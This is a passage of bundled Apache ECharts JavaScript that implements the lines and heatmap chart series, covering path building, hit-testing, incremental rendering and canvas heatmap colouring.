frame = Math.min(frame - 1, len$$1 - 2);\n    }\n\n    lerp(\n        symbol.position, points[frame], points[frame + 1],\n        (t - offsets[frame]) / (offsets[frame + 1] - offsets[frame])\n    );\n\n    var tx = points[frame + 1][0] - points[frame][0];\n    var ty = points[frame + 1][1] - points[frame][1];\n    symbol.rotation = -Math.atan2(ty, tx) - Math.PI / 2;\n\n    this._lastFrame = frame;\n    this._lastFramePercent = t;\n\n    symbol.ignore = false;\n};\n\ninherits(EffectPolyline, EffectLine);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// TODO Batch by color\n\nvar LargeLineShape = extendShape({\n\n    shape: {\n        polyline: false,\n        curveness: 0,\n        segs: []\n    },\n\n    buildPath: function (path, shape) {\n        var segs = shape.segs;\n        var curveness = shape.curveness;\n\n        if (shape.polyline) {\n            for (var i = 0; i < segs.length;) {\n                var count = segs[i++];\n                if (count > 0) {\n                    path.moveTo(segs[i++], segs[i++]);\n                    for (var k = 1; k < count; k++) {\n                        path.lineTo(segs[i++], segs[i++]);\n                    }\n                }\n            }\n        }\n        else {\n            for (var i = 0; i < segs.length;) {\n                var x0 = segs[i++];\n                var y0 = segs[i++];\n                var x1 = segs[i++];\n                var y1 = segs[i++];\n                path.moveTo(x0, y0);\n                if (curveness > 0) {\n                    var x2 = (x0 + x1) / 2 - (y0 - y1) * curveness;\n                    var y2 = (y0 + y1) / 2 - (x1 - x0) * curveness;\n                    path.quadraticCurveTo(x2, y2, x1, y1);\n                }\n                else {\n                    path.lineTo(x1, y1);\n                }\n            }\n        }\n    },\n\n    findDataIndex: function (x, y) {\n\n        var shape = this.shape;\n        var segs = shape.segs;\n        var curveness = shape.curveness;\n\n        if (shape.polyline) {\n            var dataIndex = 0;\n            for (var i = 0; i < segs.length;) {\n                var count = segs[i++];\n                if (count > 0) {\n                    var x0 = segs[i++];\n                    var y0 = segs[i++];\n                    for (var k = 1; k < count; k++) {\n                        var x1 = segs[i++];\n                        var y1 = segs[i++];\n                        if (containStroke$1(x0, y0, x1, y1)) {\n                            return dataIndex;\n                        }\n                    }\n                }\n\n                dataIndex++;\n            }\n        }\n        else {\n            var dataIndex = 0;\n            for (var i = 0; i < segs.length;) {\n                var x0 = segs[i++];\n                var y0 = segs[i++];\n                var x1 = segs[i++];\n                var y1 = segs[i++];\n                if (curveness > 0) {\n                    var x2 = (x0 + x1) / 2 - (y0 - y1) * curveness;\n                    var y2 = (y0 + y1) / 2 - (x1 - x0) * curveness;\n\n                    if (containStroke$3(x0, y0, x2, y2, x1, y1)) {\n                        return dataIndex;\n                    }\n                }\n                else {\n                    if (containStroke$1(x0, y0, x1, y1)) {\n                        return dataIndex;\n                    }\n                }\n\n                dataIndex++;\n            }\n        }\n\n        return -1;\n    }\n});\n\nfunction LargeLineDraw() {\n    this.group = new Group();\n}\n\nvar largeLineProto = LargeLineDraw.prototype;\n\nlargeLineProto.isPersistent = function () {\n    return !this._incremental;\n};\n\n/**\n * Update symbols draw by new data\n * @param {module:echarts/data/List} data\n */\nlargeLineProto.updateData = function (data) {\n    this.group.removeAll();\n\n    var lineEl = new LargeLineShape({\n        rectHover: true,\n        cursor: 'default'\n    });\n    lineEl.setShape({\n        segs: data.getLayout('linesPoints')\n    });\n\n    this._setCommon(lineEl, data);\n\n    // Add back\n    this.group.add(lineEl);\n\n    this._incremental = null;\n};\n\n/**\n * @override\n */\nlargeLineProto.incrementalPrepareUpdate = function (data) {\n    this.group.removeAll();\n\n    this._clearIncremental();\n\n    if (data.count() > 5e5) {\n        if (!this._incremental) {\n            this._incremental = new IncrementalDisplayble({\n                silent: true\n            });\n        }\n        this.group.add(this._incremental);\n    }\n    else {\n        this._incremental = null;\n    }\n};\n\n/**\n * @override\n */\nlargeLineProto.incrementalUpdate = function (taskParams, data) {\n    var lineEl = new LargeLineShape();\n    lineEl.setShape({\n        segs: data.getLayout('linesPoints')\n    });\n\n    this._setCommon(lineEl, data, !!this._incremental);\n\n    if (!this._incremental) {\n        lineEl.rectHover = true;\n        lineEl.cursor = 'default';\n        lineEl.__startIndex = taskParams.start;\n        this.group.add(lineEl);\n    }\n    else {\n        this._incremental.addDisplayable(lineEl, true);\n    }\n};\n\n/**\n * @override\n */\nlargeLineProto.remove = function () {\n    this._clearIncremental();\n    this._incremental = null;\n    this.group.removeAll();\n};\n\nlargeLineProto._setCommon = function (lineEl, data, isIncremental) {\n    var hostModel = data.hostModel;\n\n    lineEl.setShape({\n        polyline: hostModel.get('polyline'),\n        curveness: hostModel.get('lineStyle.curveness')\n    });\n\n    lineEl.useStyle(\n        hostModel.getModel('lineStyle').getLineStyle()\n    );\n    lineEl.style.strokeNoScale = true;\n\n    var visualColor = data.getVisual('color');\n    if (visualColor) {\n        lineEl.setStyle('stroke', visualColor);\n    }\n    lineEl.setStyle('fill');\n\n    if (!isIncremental) {\n        // Enable tooltip\n        // PENDING May have performance issue when path is extremely large\n        lineEl.seriesIndex = hostModel.seriesIndex;\n        lineEl.on('mousemove', function (e) {\n            lineEl.dataIndex = null;\n            var dataIndex = lineEl.findDataIndex(e.offsetX, e.offsetY);\n            if (dataIndex > 0) {\n                // Provide dataIndex for tooltip\n                lineEl.dataIndex = dataIndex + lineEl.__startIndex;\n            }\n        });\n    }\n};\n\nlargeLineProto._clearIncremental = function () {\n    var incremental = this._incremental;\n    if (incremental) {\n        incremental.clearDisplaybles();\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Float32Array */\n\nvar linesLayout = {\n    seriesType: 'lines',\n\n    plan: createRenderPlanner(),\n\n    reset: function (seriesModel) {\n        var coordSys = seriesModel.coordinateSystem;\n        var isPolyline = seriesModel.get('polyline');\n        var isLarge = seriesModel.pipelineContext.large;\n\n        function progress(params, lineData) {\n            var lineCoords = [];\n            if (isLarge) {\n                var points;\n                var segCount = params.end - params.start;\n                if (isPolyline) {\n                    var totalCoordsCount = 0;\n                    for (var i = params.start; i < params.end; i++) {\n                        totalCoordsCount += seriesModel.getLineCoordsCount(i);\n                    }\n                    points = new Float32Array(segCount + totalCoordsCount * 2);\n                }\n                else {\n                    points = new Float32Array(segCount * 4);\n                }\n\n                var offset = 0;\n                var pt = [];\n                for (var i = params.start; i < params.end; i++) {\n                    var len = seriesModel.getLineCoords(i, lineCoords);\n                    if (isPolyline) {\n                        points[offset++] = len;\n                    }\n                    for (var k = 0; k < len; k++) {\n                        pt = coordSys.dataToPoint(lineCoords[k], false, pt);\n                        points[offset++] = pt[0];\n                        points[offset++] = pt[1];\n                    }\n                }\n\n                lineData.setLayout('linesPoints', points);\n            }\n            else {\n                for (var i = params.start; i < params.end; i++) {\n                    var itemModel = lineData.getItemModel(i);\n                    var len = seriesModel.getLineCoords(i, lineCoords);\n\n                    var pts = [];\n                    if (isPolyline) {\n                        for (var j = 0; j < len; j++) {\n                            pts.push(coordSys.dataToPoint(lineCoords[j]));\n                        }\n                    }\n                    else {\n                        pts[0] = coordSys.dataToPoint(lineCoords[0]);\n                        pts[1] = coordSys.dataToPoint(lineCoords[1]);\n\n                        var curveness = itemModel.get('lineStyle.curveness');\n                        if (+curveness) {\n                            pts[2] = [\n                                (pts[0][0] + pts[1][0]) / 2 - (pts[0][1] - pts[1][1]) * curveness,\n                                (pts[0][1] + pts[1][1]) / 2 - (pts[1][0] - pts[0][0]) * curveness\n                            ];\n                        }\n                    }\n                    lineData.setItemLayout(i, pts);\n                }\n            }\n        }\n\n        return { progress: progress };\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendChartView({\n\n    type: 'lines',\n\n    init: function () {},\n\n    render: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n\n        var lineDraw = this._updateLineDraw(data, seriesModel);\n\n        var zlevel = seriesModel.get('zlevel');\n        var trailLength = seriesModel.get('effect.trailLength');\n\n        var zr = api.getZr();\n        // Avoid the drag cause ghost shadow\n        // FIXME Better way ?\n        // SVG doesn't support\n        var isSvg = zr.painter.getType() === 'svg';\n        if (!isSvg) {\n            zr.painter.getLayer(zlevel).clear(true);\n        }\n        // Config layer with motion blur\n        if (this._lastZlevel != null && !isSvg) {\n            zr.configLayer(this._lastZlevel, {\n                motionBlur: false\n            });\n        }\n        if (this._showEffect(seriesModel) && trailLength) {\n            if (__DEV__) {\n                var notInIndividual = false;\n                ecModel.eachSeries(function (otherSeriesModel) {\n                    if (otherSeriesModel !== seriesModel && otherSeriesModel.get('zlevel') === zlevel) {\n                        notInIndividual = true;\n                    }\n                });\n                notInIndividual && console.warn('Lines with trail effect should have an individual zlevel');\n            }\n\n            if (!isSvg) {\n                zr.configLayer(zlevel, {\n                    motionBlur: true,\n                    lastFrameAlpha: Math.max(Math.min(trailLength / 10 + 0.9, 1), 0)\n                });\n            }\n        }\n\n        lineDraw.updateData(data);\n\n        var clipPath = seriesModel.get('clip', true) && createClipPath(\n            seriesModel.coordinateSystem, false, seriesModel\n        );\n        if (clipPath) {\n            this.group.setClipPath(clipPath);\n        }\n        else {\n            this.group.removeClipPath();\n        }\n\n        this._lastZlevel = zlevel;\n\n        this._finished = true;\n    },\n\n    incrementalPrepareRender: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n\n        var lineDraw = this._updateLineDraw(data, seriesModel);\n\n        lineDraw.incrementalPrepareUpdate(data);\n\n        this._clearLayer(api);\n\n        this._finished = false;\n    },\n\n    incrementalRender: function (taskParams, seriesModel, ecModel) {\n        this._lineDraw.incrementalUpdate(taskParams, seriesModel.getData());\n\n        this._finished = taskParams.end === seriesModel.getData().count();\n    },\n\n    updateTransform: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n        var pipelineContext = seriesModel.pipelineContext;\n\n        if (!this._finished || pipelineContext.large || pipelineContext.progressiveRender) {\n            // TODO Don't have to do update in large mode. Only do it when there are millions of data.\n            return {\n                update: true\n            };\n        }\n        else {\n            // TODO Use same logic with ScatterView.\n            // Manually update layout\n            var res = linesLayout.reset(seriesModel);\n            if (res.progress) {\n                res.progress({ start: 0, end: data.count() }, data);\n            }\n            this._lineDraw.updateLayout();\n            this._clearLayer(api);\n        }\n    },\n\n    _updateLineDraw: function (data, seriesModel) {\n        var lineDraw = this._lineDraw;\n        var hasEffect = this._showEffect(seriesModel);\n        var isPolyline = !!seriesModel.get('polyline');\n        var pipelineContext = seriesModel.pipelineContext;\n        var isLargeDraw = pipelineContext.large;\n\n        if (__DEV__) {\n            if (hasEffect && isLargeDraw) {\n                console.warn('Large lines not support effect');\n            }\n        }\n        if (!lineDraw\n            || hasEffect !== this._hasEffet\n            || isPolyline !== this._isPolyline\n            || isLargeDraw !== this._isLargeDraw\n        ) {\n            if (lineDraw) {\n                lineDraw.remove();\n            }\n            lineDraw = this._lineDraw = isLargeDraw\n                ? new LargeLineDraw()\n                : new LineDraw(\n                    isPolyline\n                        ? (hasEffect ? EffectPolyline : Polyline$2)\n                        : (hasEffect ? EffectLine : Line$1)\n                );\n            this._hasEffet = hasEffect;\n            this._isPolyline = isPolyline;\n            this._isLargeDraw = isLargeDraw;\n            this.group.removeAll();\n        }\n\n        this.group.add(lineDraw.group);\n\n        return lineDraw;\n    },\n\n    _showEffect: function (seriesModel) {\n        return !!seriesModel.get('effect.show');\n    },\n\n    _clearLayer: function (api) {\n        // Not use motion when dragging or zooming\n        var zr = api.getZr();\n        var isSvg = zr.painter.getType() === 'svg';\n        if (!isSvg && this._lastZlevel != null) {\n            zr.painter.getLayer(this._lastZlevel).clear(true);\n        }\n    },\n\n    remove: function (ecModel, api) {\n        this._lineDraw && this._lineDraw.remove();\n        this._lineDraw = null;\n        // Clear motion when lineDraw is removed\n        this._clearLayer(api);\n    },\n\n    dispose: function () {}\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nfunction normalize$2(a) {\n    if (!(a instanceof Array)) {\n        a = [a, a];\n    }\n    return a;\n}\n\nvar opacityQuery = 'lineStyle.opacity'.split('.');\n\nvar linesVisual = {\n    seriesType: 'lines',\n    reset: function (seriesModel, ecModel, api) {\n        var symbolType = normalize$2(seriesModel.get('symbol'));\n        var symbolSize = normalize$2(seriesModel.get('symbolSize'));\n        var data = seriesModel.getData();\n\n        data.setVisual('fromSymbol', symbolType && symbolType[0]);\n        data.setVisual('toSymbol', symbolType && symbolType[1]);\n        data.setVisual('fromSymbolSize', symbolSize && symbolSize[0]);\n        data.setVisual('toSymbolSize', symbolSize && symbolSize[1]);\n        data.setVisual('opacity', seriesModel.get(opacityQuery));\n\n        function dataEach(data, idx) {\n            var itemModel = data.getItemModel(idx);\n            var symbolType = normalize$2(itemModel.getShallow('symbol', true));\n            var symbolSize = normalize$2(itemModel.getShallow('symbolSize', true));\n            var opacity = itemModel.get(opacityQuery);\n\n            symbolType[0] && data.setItemVisual(idx, 'fromSymbol', symbolType[0]);\n            symbolType[1] && data.setItemVisual(idx, 'toSymbol', symbolType[1]);\n            symbolSize[0] && data.setItemVisual(idx, 'fromSymbolSize', symbolSize[0]);\n            symbolSize[1] && data.setItemVisual(idx, 'toSymbolSize', symbolSize[1]);\n\n            data.setItemVisual(idx, 'opacity', opacity);\n        }\n\n        return {dataEach: data.hasItemOption ? dataEach : null};\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterLayout(linesLayout);\nregisterVisual(linesVisual);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nSeriesModel.extend({\n    type: 'series.heatmap',\n\n    getInitialData: function (option, ecModel) {\n        return createListFromArray(this.getSource(), this, {\n            generateCoord: 'value'\n        });\n    },\n\n    preventIncremental: function () {\n        var coordSysCreator = CoordinateSystemManager.get(this.get('coordinateSystem'));\n        if (coordSysCreator && coordSysCreator.dimensions) {\n            return coordSysCreator.dimensions[0] === 'lng' && coordSysCreator.dimensions[1] === 'lat';\n        }\n    },\n\n    defaultOption: {\n\n        // Cartesian2D or geo\n        coordinateSystem: 'cartesian2d',\n\n        zlevel: 0,\n\n        z: 2,\n\n        // Cartesian coordinate system\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n\n        // Geo coordinate system\n        geoIndex: 0,\n\n        blurSize: 30,\n\n        pointSize: 20,\n\n        maxOpacity: 1,\n\n        minOpacity: 0\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Uint8ClampedArray */\n\nvar GRADIENT_LEVELS = 256;\n\n/**\n * Heatmap Chart\n *\n * @class\n */\nfunction Heatmap() {\n    var canvas = createCanvas();\n    this.canvas = canvas;\n\n    this.blurSize = 30;\n    this.pointSize = 20;\n\n    this.maxOpacity = 1;\n    this.minOpacity = 0;\n\n    this._gradientPixels = {};\n}\n\nHeatmap.prototype = {\n    /**\n     * Renders Heatmap and returns the rendered canvas\n     * @param {Array} data array of data, each has x, y, value\n     * @param {number} width canvas width\n     * @param {number} height canvas height\n     */\n    update: function (data, width, height, normalize, colorFunc, isInRange) {\n        var brush = this._getBrush();\n        var gradientInRange = this._getGradient(data, colorFunc, 'inRange');\n        var gradientOutOfRange = this._getGradient(data, colorFunc, 'outOfRange');\n        var r = this.pointSize + this.blurSize;\n\n        var canvas = this.canvas;\n        var ctx = canvas.getContext('2d');\n        var len = data.length;\n        canvas.width = width;\n        canvas.height = height;\n        for (var i = 0; i < len; ++i) {\n            var p = data[i];\n            var x = p[0];\n            var y = p[1];\n            var value = p[2];\n\n            // calculate alpha using value\n            var alpha = normalize(value);\n\n            // draw with the circle brush with alpha\n            ctx.globalAlpha = alpha;\n            ctx.drawImage(brush, x - r, y - r);\n        }\n\n        if (!canvas.width || !canvas.height) {\n            // Avoid \"Uncaught DOMException: Failed to execute 'getImageData' on\n            // 'CanvasRenderingContext2D': The source height is 0.\"\n            return canvas;\n        }\n\n        // colorize the canvas using alpha value and set with gradient\n        var imageData = ctx.getImageData(0, 0, canvas.width, canvas.height);\n\n        var pixels = imageData.data;\n        var offset = 0;\n        var pixelLen = pixels.length;\n        var minOpacity = this.minOpacity;\n        var maxOpacity = this.maxOpacity;\n        var diffOpacity = maxOpacity - minOpacity;\n\n        while (offset < pixelLen) {\n            var alpha = pixels[offset + 3] / 256;\n            var gradientOffset = Math.floor(alpha * (GRADIENT_LEVELS - 1)) * 4;\n            // Simple optimize to ignore the empty data\n            if (alpha > 0) {\n                var gradient = isInRange(alpha) ? gradientInRange : gradientOutOfRange;\n                // Any alpha > 0 will be mapped to [minOpacity, maxOpacity]\n                alpha > 0 && (alpha = alpha * diffOpacity + minOpacity);\n                pixels[offset++] = gradient[gradientOffset];\n                pixels[offset++] = gradient[gradientOffset + 1];\n                pixels[offset++] = gradient[gradientOffset + 2];\n                pixels[offset++] = gradient[gradientOffset + 3] * alpha * 256;\n            }\n            else {\n                offset += 4;\n            }\n        }\n        ctx.putImageData(imageData, 0, 0);\n\n        return canvas;\n    },\n\n    /**\n     * get canvas of a black circle brush used for canvas to draw later\n     * @private\n     * @returns {Object} circle brush canvas\n     */\n    _getBrush: function () {\n        var brushCanvas = this._brushCanvas || (this._brushCanvas = createCanvas());\n        // set brush size\n        var r = this.pointSize + this.blurSize;\n        var d = r * 2;\n        brushCanvas.width = d;\n        brushCanvas.height = d;\n\n        var ctx = brushCanvas.getContext('2d');\n        ctx.clearRect(0, 0, d, d);\n\n        // in order to render shadow without the distinct circle,\n        // draw the distinct circle in an invisible place,\n        // and use shadowOffset to draw shadow in the center of the canvas\n        ctx.shadowOffsetX = d;\n        ctx.shadowBlur = this.blurSize;\n        // draw the shadow in black, and use alpha and shadow blur to generate\n        // color in color map\n        ctx.shadowColor = '#000';\n\n        // draw circle in the left to the canvas\n        ctx.beginPath();\n        ctx.arc(-r, r, this.pointSize, 0, Math.PI * 2, true);\n        ctx.closePath();\n        ctx.fill();\n        return brushCanvas;\n    },\n\n    /**\n     * get gradient color map\n     * @private\n     */\n    _getGradient: function (data, colorFunc, state) {\n        var gradientPixels = this._gradientPixels;\n        var pixelsSingleState = gradientPixels[state] || (gradientPixels[state] = new Uint8ClampedArray(256 * 4));\n        var color = [0, 0, 0, 0];\n        var off = 0;\n        for (var i = 0; i < 256; i++) {\n            colorFunc[state](i / 255, true, color);\n            pixelsSingleState[off++] = color[0];\n            pixelsSingleState[off++] = color[1];\n            pixelsSingleState[off++] = color[2];\n            pixelsSingleState[off++] = color[3];\n        }\n        return pixelsSingleState;\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction getIsInPiecewiseRange(dataExtent, pieceList, selected) {\n    var dataSpan = dataExtent[1] - dataExtent[0];\n    pieceList = map(pieceList, function (piece) {\n        return {\n            interval: [\n                (piece.interval[0] - dataExtent[0]) / dataSpan,\n                (piece.interval[1] - dataExtent[0]) / dataSpan\n            ]\n        };\n    });\n    var len = pieceList.length;\n    var lastIndex = 0;\n\n    return function (val) {\n        // Try to find in the location of the last found\n        for (var i = lastIndex; i < len; i++) {\n            var interval = pieceList[i].interval;\n            if (interval[0] <= val && val <= interval[1]) {\n                lastIndex = i;\n                break;\n            }\n        }\n        if (i === len) { // Not found, back interation\n            for (var i = lastIndex - 1; i >= 0; i--) {\n                var interval = pieceList[i].interval;\n                if (interval[0] <= val && val <= interval[1]) {\n                    lastIndex = i;\n                    break;\n                }\n            }\n        }\n        return i >= 0 && i < len && selected[i];\n    };\n}\n\nfunction getIsInContinuousRange(dataExtent, range) {\n    var dataSpan = dataExtent[1] - dataExtent[0];\n    range = [\n        (range[0] - dataExtent[0]) / dataSpan,\n        (range[1] - dataExtent[0]) / dataSpan\n    ];\n    return function (val) {\n        return val >= range[0] && val <= range[1];\n    };\n}\n\nfunction isGeoCoordSys(coordSys) {\n    var dimensions = coordSys.dimensions;\n    // Not use coorSys.type === 'geo' because coordSys maybe extended\n    return dimensions[0] === 'lng' && dimensions[1] === 'lat';\n}\n\nextendChartView({\n\n    type: 'heatmap',\n\n    render: function (seriesModel, ecModel, api) {\n        var visualMapOfThisSeries;\n        ecModel.eachComponent('visualMap', function (visualMap) {\n            visualMap.eachTargetSeries(function (targetSeries) {\n                if (targetSeries === seriesModel) {\n                    visualMapOfThisSeries = visualMap;\n                }\n            });\n        });\n\n        if (__DEV__) {\n            if (!visualMapOfThisSeries) {\n                throw new Error('Heatmap must use with visualMap');\n            }\n        }\n\n        this.group.removeAll();\n\n        this._incrementalDisplayable = null;\n\n        var coordSys = seriesModel.coordinateSystem;\n        if (coordSys.type === 'cartesian2d' || coordSys.type === 'calendar') {\n            this._renderOnCartesianAndCalendar(seriesModel, api, 0, seriesModel.getData().count());\n        }\n        else if (isGeoCoordSys(coordSys)) {\n            this._renderOnGeo(\n                coordSys, seriesModel, visualMapOfThisSeries, api\n            );\n        }\n    },\n\n    incrementalPrepareRender: function (seriesModel, ecModel, api) {\n        this.group.removeAll();\n    },\n\n    incrementalRender: function (params, seriesModel, ecModel, api) {\n        var coordSys = seriesModel.coordinateSystem;\n        if (coordSys) {\n            this._renderOnCartesianAndCalendar(seriesModel, api, params.start, params.end, true);\n        }\n    },\n\n    _renderOnCartesianAndCalendar: function (seriesModel, api, start, end, incremental) {\n\n        var coordSys = seriesModel.coordinateSystem;\n        var width;\n        var height;\n\n        if (coordSys.type === 'cartesian2d') {\n            var xAxis = coordSys.getAxis('x');\n            var yAxis = coordSys.getAxis('y');\n\n            if (__DEV__) {\n                if (!(xAxis.type === 'category' && yAxis.type === 'category')) {\n                    throw new Error('Heatmap on cartesian must have two category axes');\n                }\n                if (!(xAxis.onBand && yAxis.onBand)) {\n                    throw new Error('Heatmap on cartesian must have two axes with boundaryGap true');\n                }\n            }\n\n            width = xAxis.getBandWidth();\n            height = yAxis.getBandWidth();\n        }\n\n        var group = this.group;\n        var data = seriesModel.getData();\n\n        var itemStyleQuery = 'itemStyle';\n        var hoverItemStyleQuery = 'emphasis.itemStyle';\n        var labelQuery = 'label';\n        var hoverLabelQuery = 'emphasis.label';\n        var style = seriesModel.getModel(itemStyleQuery).getItemStyle(['color']);\n        var hoverStl = seriesModel.getModel(hoverItemStyleQuery).getItemStyle();\n        var labelModel = seriesModel.getModel(labelQuery);\n        var hoverLabelModel = seriesModel.getModel(hoverLabelQuery);\n        var coordSysType = coordSys.type;\n\n\n        var dataDims = coordSysType === 'cartesian2d'\n            ? [\n                data.mapDimension('x'),\n                data.mapDimension('y'),\n                data.mapDimension('value')\n            ]\n            : [\n                data.mapDimension('time'),\n                data.mapDimension('value')\n            ];\n\n        for (var idx = start; idx < end; idx++) {\n            var rect;\n\n            if (coordSysType === 'cartesian2d') {\n                // Ignore empty data\n                if (isNaN(data.get(dataDims[2], idx))) {\n                    continue;\n                }\n\n                var point = coordSys.dataToPoint([\n                    data.get(dataDims[0], idx),\n                    data.get(dataDims[1], idx)\n                ]);\n\n                rect = new Rect({\n                    shape: {\n                        x: Math.floor(point[0] - width / 2),\n                        y: Math.floor(point[1] - height / 2),\n                        width: Math.ceil(width),\n                        height: Math.ceil(height)\n                    },\n                    style: {\n                        fill: data.getItemVisual(idx, 'color'),\n                        opacity: data.getItemVisual(idx, 'opacity')\n                    }\n                });\n            }\n            else {\n                // Ignore empty data\n                if (isNaN(data.get(dataDims[1], idx))) {\n                    continue;\n                }\n\n                rect = new Rect({\n                    z2: 1,\n                    shape: coordSys.dataToRect([data.get(dataDims[0], idx)]).contentShape,\n                    style: {\n                        fill: data.getItemVisual(idx, 'color'),\n                        opacity: data.getItemVisual(idx, 'opacity')\n                    }\n                });\n            }\n\n            var itemModel = data.getItemModel(idx);\n\n            // Optimization for large datset\n            if (data.hasItemOption) {\n                style = itemModel.getModel(itemStyleQuery).getItemStyle(['color']);\n                hoverStl = itemModel.getModel(hoverItemStyleQuery).getItemStyle();\n                labelModel = itemModel.getModel(labelQuery);\n                hoverLabelModel = itemModel.getModel(hoverLabelQuery);\n            }\n\n            var rawValue = seriesModel.getRawValue(idx);\n            var defaultText = '-';\n            if (rawValue && rawValue[2] != null) {\n                defaultText = rawValue[2];\n            }\n\n            setLabelStyle(\n                style, hoverStl, labelModel, hoverLabelModel,\n                {\n                    labelFetcher: seriesModel,\n                    labelDataIndex: idx,\n                    defaultText: defaultText,\n                    isRectText: true\n                }\n            );\n\n            rect.setStyle(style);\n            setHoverStyle(rect, data.hasItemOption ? hoverStl : extend({}, hoverStl));\n\n            rect.incremental = incremental;\n            // PENDING\n            if (incremental) {\n                // Rect must use hover layer if it's incremental.\n                rect.useHoverLayer = true;\n            }\n\n            group.add(rect);\n            data.setItemGraphicEl(idx, rect);\n        }\n    },\n\n    _renderOnGeo: function (geo, seriesModel, visualMapModel, api) {\n        var inRangeVisuals = visualMapModel.targetVisuals.inRange;\n        var outOfRangeVisuals = visualMapModel.targetVisuals.outOfRange;\n        // if (!visualMapping) {\n        //     throw new Error('Data range must have color visuals');\n        // }\n\n        var data = seriesModel.getData();\n        var hmLayer = this._hmLayer || (this._hmLayer || new Heatmap());\n        hmLayer.blurSize = seriesModel.get('blurSize');\n        hmLayer.pointSize = seriesModel.get('pointSize');\n        hmLayer.minOpacity = seriesModel.get('minOpacity');\n        hmLayer.maxOpacity = seriesModel.get('maxOpacity');\n\n        var rect = geo.getViewRect().clone();\n        var roamTransform = geo.getRoamTransform();\n        rect.applyTransform(roamTransform);\n\n        // Clamp on viewport\n        var x = Math.max(rect.x, 0);\n        var y = Math.max(rect.y, 0);\n   